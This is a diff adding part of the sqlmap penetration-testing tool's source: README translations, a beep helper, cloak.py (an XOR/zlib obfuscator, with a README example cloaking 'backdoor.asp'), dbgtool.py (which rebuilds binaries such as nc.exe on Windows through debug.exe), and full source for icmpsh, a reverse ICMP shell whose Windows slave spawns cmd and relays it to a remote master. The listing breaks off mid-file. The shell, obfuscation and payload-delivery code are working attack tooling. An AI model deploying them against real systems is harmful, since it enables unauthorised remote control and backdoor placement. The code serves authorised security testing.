+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng SQL injection và tiếp quản các máy chủ cơ sở dữ liệu. Công cụ này đi kèm với +một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập file hệ thống và thực hiện các lệnh trên hệ điều hành từ xa. + +Ảnh chụp màn hình +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nơi trình bày một số tính năng có thể tìm thấy trong wiki. + +Cài đặt +---- + + +Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone về repo [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào. + +Sử dụng +---- + +Để có được danh sách các tùy chọn cơ bản và switch, hãy chạy: + + python sqlmap.py -h + +Để có được danh sách tất cả các tùy chọn và switch, hãy chạy: + + python sqlmap.py -hh + +Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601). +Để có cái nhìn tổng quan về sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). + +Liên kết +---- + +* Trang chủ: https://sqlmap.org +* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues +* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki +* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-zh-CN.md b/src/sqlmap-master/doc/translations/README-zh-CN.md new file mode 100644 index 0000000..f3431d4 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-zh-CN.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。 + +演示截图 +---- + +![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +你可以查看 wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解各种用法的示例 + +安装方法 +---- + +你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的源代码,或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的源代码. + +推荐直接从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap 可以运行在 [Python](https://www.python.org/download/) **2.6**, **2.7** 和 **3.x** 版本的任何平台上 + +使用方法 +---- + +通过如下命令可以查看基本的用法及命令行参数: + + python sqlmap.py -h + +通过如下的命令可以查看所有的用法及命令行参数: + + python sqlmap.py -hh + +你可以从 [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取 sqlmap 所有支持的特性、参数、命令行选项开关及详细的使用帮助。 + +链接 +---- + +* 项目主页: https://sqlmap.org +* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commit的 RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues +* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki +* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/extra/__init__.py b/src/sqlmap-master/extra/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/extra/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/extra/beep/__init__.py b/src/sqlmap-master/extra/beep/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/extra/beep/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/extra/beep/beep.py b/src/sqlmap-master/extra/beep/beep.py new file mode 100644 index 0000000..788bafd --- /dev/null +++ b/src/sqlmap-master/extra/beep/beep.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python + +""" +beep.py - Make a beep sound + +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import sys +import wave + +BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav") + +def beep(): + try: + if sys.platform.startswith("win"): + _win_wav_play(BEEP_WAV_FILENAME) + elif sys.platform.startswith("darwin"): + _mac_beep() + elif sys.platform.startswith("cygwin"): + _cygwin_beep(BEEP_WAV_FILENAME) + elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")): + _linux_wav_play(BEEP_WAV_FILENAME) + else: + _speaker_beep() + except: + _speaker_beep() + +def _speaker_beep(): + sys.stdout.write('\a') # doesn't work on modern Linux systems + + try: + sys.stdout.flush() + except IOError: + pass + +# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html +def _cygwin_beep(filename): + os.system("play-sound-file '%s' 2>/dev/null" % filename) + +def _mac_beep(): + import Carbon.Snd + Carbon.Snd.SysBeep(1) + +def _win_wav_play(filename): + import winsound + + winsound.PlaySound(filename, winsound.SND_FILENAME) + +def _linux_wav_play(filename): + for _ in ("aplay", "paplay", "play"): + if not os.system("%s '%s' 2>/dev/null" % (_, filename)): + return + + import ctypes + + PA_STREAM_PLAYBACK = 1 + PA_SAMPLE_S16LE = 3 + BUFFSIZE = 1024 + + class struct_pa_sample_spec(ctypes.Structure): + _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] + + try: + pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") + except OSError: + return + + wave_file = wave.open(filename, "rb") + + pa_sample_spec = struct_pa_sample_spec() + pa_sample_spec.rate = wave_file.getframerate() + pa_sample_spec.channels = wave_file.getnchannels() + pa_sample_spec.format = PA_SAMPLE_S16LE + + error = ctypes.c_int(0) + + pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error)) + if not pa_stream: + raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) + + while True: + latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) + if latency == -1: + raise Exception("Getting latency failed") + + buf = wave_file.readframes(BUFFSIZE) + if not buf: + break + + if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): + raise Exception("Could not play file") + + wave_file.close() + + if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): + raise Exception("Could not simple drain") + + pa.pa_simple_free(pa_stream) + +if __name__ == "__main__": + beep() diff --git a/src/sqlmap-master/extra/beep/beep.wav b/src/sqlmap-master/extra/beep/beep.wav new file mode 100644 index 0000000..35903d8 Binary files /dev/null and b/src/sqlmap-master/extra/beep/beep.wav differ diff --git a/src/sqlmap-master/extra/cloak/README.txt b/src/sqlmap-master/extra/cloak/README.txt new file mode 100644 index 0000000..7743ff0 --- /dev/null +++ b/src/sqlmap-master/extra/cloak/README.txt @@ -0,0 +1,22 @@ +To use cloak.py you need to pass it the original file, +and optionally the output file name. + +Example: + +$ python ./cloak.py -i backdoor.asp -o backdoor.asp_ + +This will create an encrypted and compressed binary file backdoor.asp_. + +Such file can then be converted to its original form by using the -d +functionality of the cloak.py program: + +$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp + +If you skip the output file name, general rule is that the compressed +file names are suffixed with the character '_', while the original is +get by skipping the last character. So, that means that the upper +examples can also be written in the following form: + +$ python ./cloak.py -i backdoor.asp + +$ python ./cloak.py -d -i backdoor.asp_ diff --git a/src/sqlmap-master/extra/cloak/__init__.py b/src/sqlmap-master/extra/cloak/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/extra/cloak/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/extra/cloak/cloak.py b/src/sqlmap-master/extra/cloak/cloak.py new file mode 100644 index 0000000..8f361a0 --- /dev/null +++ b/src/sqlmap-master/extra/cloak/cloak.py @@ -0,0 +1,88 @@ +#!/usr/bin/env python + +""" +cloak.py - Simple file encryption/compression utility + +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import os +import struct +import sys +import zlib + +from optparse import OptionError +from optparse import OptionParser + +if sys.version_info >= (3, 0): + xrange = range + ord = lambda _: _ + +KEY = b"E6wRbVhD0IBeCiGJ" + +def xor(message, key): + return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) + +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() + + return xor(zlib.compress(data), KEY) + +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() + try: + data = zlib.decompress(xor(data, KEY)) + except Exception as ex: + print(ex) + print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile) + sys.exit(1) + finally: + f.close() + + return data + +def main(): + usage = '%s [-d] -i [-o ]' % sys.argv[0] + parser = OptionParser(usage=usage, version='0.2') + + try: + parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') + parser.add_option('-i', dest='inputFile', help='Input file') + parser.add_option('-o', dest='outputFile', help='Output file') + + (args, _) = parser.parse_args() + + if not args.inputFile: + parser.error('Missing the input file, -h for help') + + except (OptionError, TypeError) as ex: + parser.error(ex) + + if not os.path.isfile(args.inputFile): + print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile) + sys.exit(1) + + if not args.decrypt: + data = cloak(args.inputFile) + else: + data = decloak(args.inputFile) + + if not args.outputFile: + if not args.decrypt: + args.outputFile = args.inputFile + '_' + else: + args.outputFile = args.inputFile[:-1] + + f = open(args.outputFile, 'wb') + f.write(data) + f.close() + +if __name__ == '__main__': + main() diff --git a/src/sqlmap-master/extra/dbgtool/README.txt b/src/sqlmap-master/extra/dbgtool/README.txt new file mode 100644 index 0000000..fa55859 --- /dev/null +++ b/src/sqlmap-master/extra/dbgtool/README.txt @@ -0,0 +1,20 @@ +To use dbgtool.py you need to pass it the MS-DOS executable binary file, +and optionally the output debug.exe script file name. + +Example: + +$ python ./dbgtool.py -i ./nc.exe -o nc.scr + +This will create a ASCII text file with CRLF line terminators called +nc.scr. + +Such file can then be converted to its original portable executable with +the Windows native debug.exe, that is installed by default in all Windows +systems: + +> debug.exe < nc.scr + +To be able to execute it on Windows you have to rename it to end with +'.com' or '.exe': + +> ren nc_exe nc.exe diff --git a/src/sqlmap-master/extra/dbgtool/__init__.py b/src/sqlmap-master/extra/dbgtool/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/extra/dbgtool/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/extra/dbgtool/dbgtool.py b/src/sqlmap-master/extra/dbgtool/dbgtool.py new file mode 100644 index 0000000..5443af7 --- /dev/null +++ b/src/sqlmap-master/extra/dbgtool/dbgtool.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python + +""" +dbgtool.py - Portable executable to ASCII debug script converter + +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import os +import sys + +from optparse import OptionError +from optparse import OptionParser + +def convert(inputFile): + fileStat = os.stat(inputFile) + fileSize = fileStat.st_size + + if fileSize > 65280: + print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile) + sys.exit(1) + + script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) + script += "%x\nf 0100 ffff 00\n" % fileSize + scrString = "" + counter = 256 + counter2 = 0 + + fp = open(inputFile, "rb") + fileContent = fp.read() + + for fileChar in fileContent: + unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar) + + if unsignedFileChar != 0: + counter2 += 1 + + if not scrString: + scrString = "e %0x %02x" % (counter, unsignedFileChar) + else: + scrString += " %02x" % unsignedFileChar + elif scrString: + script += "%s\n" % scrString + scrString = "" + counter2 = 0 + + counter += 1 + + if counter2 == 20: + script += "%s\n" % scrString + scrString = "" + counter2 = 0 + + script += "w\nq\n" + + return script + +def main(inputFile, outputFile): + if not os.path.isfile(inputFile): + print("ERROR: the provided input file '%s' is not a regular file" % inputFile) + sys.exit(1) + + script = convert(inputFile) + + if outputFile: + fpOut = open(outputFile, "w") + sys.stdout = fpOut + sys.stdout.write(script) + sys.stdout.close() + else: + print(script) + +if __name__ == "__main__": + usage = "%s -i [-o ]" % sys.argv[0] + parser = OptionParser(usage=usage, version="0.1") + + try: + parser.add_option("-i", dest="inputFile", help="Input binary file") + + parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") + + (args, _) = parser.parse_args() + + if not args.inputFile: + parser.error("Missing the input file, -h for help") + + except (OptionError, TypeError) as ex: + parser.error(ex) + + inputFile = args.inputFile + outputFile = args.outputFile + + main(inputFile, outputFile) diff --git a/src/sqlmap-master/extra/icmpsh/README.txt b/src/sqlmap-master/extra/icmpsh/README.txt new file mode 100644 index 0000000..d09e83b --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/README.txt @@ -0,0 +1,45 @@ +icmpsh - simple reverse ICMP shell + +icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. + + +--- Running the Master --- + +The master is straight forward to use. There are no extra libraries required for the C version. +The Perl master however has the following dependencies: + + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP + + +When running the master, don't forget to disable ICMP replies by the OS. For example: + + sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive +commands send from the master. + + +--- Running the Slave --- + +The slave comes with a few command line options as outlined below: + + +-t host host ip address to send ping requests to. This option is mandatory! + +-r send a single test icmp request containing the string "Test1234" and then quit. + This is for testing the connection. + +-d milliseconds delay between requests in milliseconds + +-o milliseconds timeout of responses in milliseconds. If a response has not received in time, + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + The counter is set back to 0 if a response was received. + +-b num limit of blanks (unanswered icmp requests before quitting + +-s bytes maximal data buffer size in bytes + + +In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/src/sqlmap-master/extra/icmpsh/__init__.py b/src/sqlmap-master/extra/icmpsh/__init__.py new file mode 100644 index 0000000..1e340fa --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/__init__.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python +# +# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in +# Perl by Nico Leidecker ) +# +# Copyright (c) 2010, Bernardo Damele A. G. +# +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +pass diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh-m.c b/src/sqlmap-master/extra/icmpsh/icmpsh-m.c new file mode 100644 index 0000000..95deb60 --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/icmpsh-m.c @@ -0,0 +1,134 @@ +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IN_BUF_SIZE 1024 +#define OUT_BUF_SIZE 64 + +// calculate checksum +unsigned short checksum(unsigned short *ptr, int nbytes) +{ + unsigned long sum; + unsigned short oddbyte, rs; + + sum = 0; + while(nbytes > 1) { + sum += *ptr++; + nbytes -= 2; + } + + if(nbytes == 1) { + oddbyte = 0; + *((unsigned char *) &oddbyte) = *(u_char *)ptr; + sum += oddbyte; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + rs = ~sum; + return rs; +} + +int main(int argc, char **argv) +{ + int sockfd; + int flags; + char in_buf[IN_BUF_SIZE]; + char out_buf[OUT_BUF_SIZE]; + unsigned int out_size; + int nbytes; + struct iphdr *ip; + struct icmphdr *icmp; + char *data; + struct sockaddr_in addr; + + + printf("icmpsh - master\n"); + + // create raw ICMP socket + sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); + if (sockfd == -1) { + perror("socket"); + return -1; + } + + // set stdin to non-blocking + flags = fcntl(0, F_GETFL, 0); + flags |= O_NONBLOCK; + fcntl(0, F_SETFL, flags); + + printf("running...\n"); + while(1) { + + // read data from socket + memset(in_buf, 0x00, IN_BUF_SIZE); + nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); + if (nbytes > 0) { + // get ip and icmp header and data part + ip = (struct iphdr *) in_buf; + if (nbytes > sizeof(struct iphdr)) { + nbytes -= sizeof(struct iphdr); + icmp = (struct icmphdr *) (ip + 1); + if (nbytes > sizeof(struct icmphdr)) { + nbytes -= sizeof(struct icmphdr); + data = (char *) (icmp + 1); + data[nbytes] = '\0'; + printf("%s", data); + fflush(stdout); + } + + // reuse headers + icmp->type = 0; + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = ip->saddr; + + // read data from stdin + nbytes = read(0, out_buf, OUT_BUF_SIZE); + if (nbytes > -1) { + memcpy((char *) (icmp + 1), out_buf, nbytes); + out_size = nbytes; + } else { + out_size = 0; + } + + icmp->checksum = 0x00; + icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); + + // send reply + nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); + if (nbytes == -1) { + perror("sendto"); + return -1; + } + } + } + } + + return 0; +} + diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh-m.pl b/src/sqlmap-master/extra/icmpsh/icmpsh-m.pl new file mode 100644 index 0000000..5a40b34 --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/icmpsh-m.pl @@ -0,0 +1,62 @@ +#!/usr/bin/env perl +# +# icmpsh - simple icmp command shell +# Copyright (c) 2010, Nico Leidecker +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# + + + +use strict; +use IO::Socket; +use NetPacket::IP; +use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); +use Net::RawIP; +use Fcntl; + +print "icmpsh - master\n"; + +# create raw socket +my $sock = IO::Socket::INET->new( + Proto => "ICMP", + Type => SOCK_RAW, + Blocking => 1) or die "$!"; + +# set stdin to non-blocking +fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; + +print "running...\n"; + +my $input = ''; +while(1) { + if ($sock->recv(my $buffer, 4096, 0)) { + my $ip = NetPacket::IP->decode($buffer); + my $icmp = NetPacket::ICMP->decode($ip->{data}); + if ($icmp->{type} == ICMP_ECHO) { + # get identifier and sequencenumber + my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); + + # write data to stdout and read from stdin + print $data; + $input = ; + + # compile and send response + $icmp->{type} = ICMP_ECHOREPLY; + $icmp->{data} = pack("SSa*", $ident, $seq, $input); + my $raw = $icmp->encode(); + my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); + $sock->send($raw, 0, $addr) or die "$!\n"; + } + } +} diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh-s.c b/src/sqlmap-master/extra/icmpsh/icmpsh-s.c new file mode 100644 index 0000000..c108509 --- /dev/null +++ b/src/sqlmap-master/extra/icmpsh/icmpsh-s.c @@ -0,0 +1,344 @@ +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + + +#include +#include +#include +#include +#include +#include + +#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) + +#define STATUS_OK 0 +#define STATUS_SINGLE 1 +#define STATUS_PROCESS_NOT_CREATED 2 + +#define TRANSFER_SUCCESS 1 +#define TRANSFER_FAILURE 0 + +#define DEFAULT_TIMEOUT 3000 +#define DEFAULT_DELAY 200 +#define DEFAULT_MAX_BLANKS 10 +#define DEFAULT_MAX_DATA_SIZE 64 + +FARPROC icmp_create, icmp_send, to_ip; + +int verbose = 0; + +int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) +{ + SECURITY_ATTRIBUTES sattr; + STARTUPINFOA si; + HANDLE in_read, out_write; + + memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); + memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); + + // create communication pipes + memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); + sattr.nLength = sizeof(SECURITY_ATTRIBUTES); + sattr.bInheritHandle = TRUE; + sattr.lpSecurityDescriptor = NULL; + + if (!CreatePipe(out_read, &out_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + if (!CreatePipe(&in_read, in_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + // spawn process + memset(&si, 0x00, sizeof(STARTUPINFO)); + si.cb = sizeof(STARTUPINFO); + si.hStdError = out_write; + si.hStdOutput = out_write; + si.hStdInput = in_read; + si.dwFlags |= STARTF_USESTDHANDLES; + + if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { + return STATUS_PROCESS_NOT_CREATED; + } + + CloseHandle(out_write); + CloseHandle(in_read); + + return STATUS_OK; +} + +void usage(char *path) +{ + printf("%s [options] -t target\n", path); + printf("options:\n"); + printf(" -t host host ip address to send ping requests to\n"); + printf(" -r send a single test icmp request and then quit\n"); + printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); + printf(" -o milliseconds timeout in milliseconds\n"); + printf(" -h this screen\n"); + printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); + printf(" before quitting\n"); + printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE); + printf("In order to improve the speed, lower the delay (-d) between requests or\n"); + printf("increase the size (-s) of the data buffer\n"); +} + +void create_icmp_channel(HANDLE *icmp_chan) +{ + // create icmp file + *icmp_chan = (HANDLE) icmp_create(); +} + +int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) +{ + int rs; + char *temp_in_buf; + int nbytes; + + PICMP_ECHO_REPLY echo_reply; + + temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); + if (!temp_in_buf) { + return TRANSFER_FAILURE; + } + + // send data to remote host + rs = icmp_send( + icmp_chan, + target, + out_buf, + out_buf_size, + NULL, + temp_in_buf, + max_in_data_size + ICMP_HEADERS_SIZE, + timeout); + + // check received data + if (rs > 0) { + echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; + if (echo_reply->DataSize > max_in_data_size) { + nbytes = max_in_data_size; + } else { + nbytes = echo_reply->DataSize; + } + memcpy(in_buf, echo_reply->Data, nbytes); + *in_buf_size = nbytes; + + free(temp_in_buf); + return TRANSFER_SUCCESS; + } + + free(temp_in_buf); + + return TRANSFER_FAILURE; +} + +int load_deps() +{ + HMODULE lib; + + lib = LoadLibraryA("ws2_32.dll"); + if (lib != NULL) { + to_ip = GetProcAddress(lib, "inet_addr"); + if (!to_ip) { + return 0; + } + } + + lib = LoadLibraryA("iphlpapi.dll"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + lib = LoadLibraryA("ICMP.DLL"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + printf("failed to load functions (%u)", GetLastError()); + + return 0; +} +int main(int argc, char **argv) +{ + int opt; + char *target; + unsigned int delay, timeout; + unsigned int ip_addr; + HANDLE pipe_read, pipe_write; + HANDLE icmp_chan; + unsigned char *in_buf, *out_buf; + unsigned int in_buf_size, out_buf_size; + DWORD rs; + int blanks, max_blanks; + PROCESS_INFORMATION pi; + int status; + unsigned int max_data_size; + + // set defaults + target = 0; + timeout = DEFAULT_TIMEOUT; + delay = DEFAULT_DELAY; + max_blanks = DEFAULT_MAX_BLANKS; + max_data_size = DEFAULT_MAX_DATA_SIZE; + + status = STATUS_OK; + if (!load_deps()) { + printf("failed to load ICMP library\n"); + return -1; + } + + // parse command line options + for (opt = 1; opt < argc; opt++) { + if (argv[opt][0] == '-') { + switch(argv[opt][1]) { + case 'h': + usage(*argv); + return 0; + case 't': + if (opt + 1 < argc) { 